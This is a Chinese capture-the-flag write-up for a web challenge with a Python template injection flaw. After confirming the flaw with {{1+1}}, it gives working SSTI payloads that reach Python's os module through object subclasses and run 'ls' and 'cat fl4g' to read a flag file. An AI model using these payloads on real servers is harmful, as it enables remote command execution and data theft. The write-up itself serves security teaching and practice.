标签：__ Web .__ web python fl4g __.__ subclasses class

进入场景后，显示如下页面

猜测本题存在Python SSTI漏洞，验证一下，在url后面添加{{1+1}}，回车显示如下

界面返回2，我们输入的1+1被执行了，说明服务器执行了{{}}里面这一段代码。

关于Python模板注入漏洞，可参考：https://www.cnblogs.com/wjw-zm/p/12741055.html

所以本题思路就是先查看当前目录，发现存在一个fl4g文件，然后读取此文件，获得flag。

首先，构造Payload1，查看当前目录，发现存在一个fl4g文件。

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

或者

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

然后，构造Payload2，读取此文件，获得flag。

{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

或者

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

标签：__,Web,.__,web,python,fl4g,__.__,subclasses,class
来源： https://www.cnblogs.com/zhengna/p/13297971.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。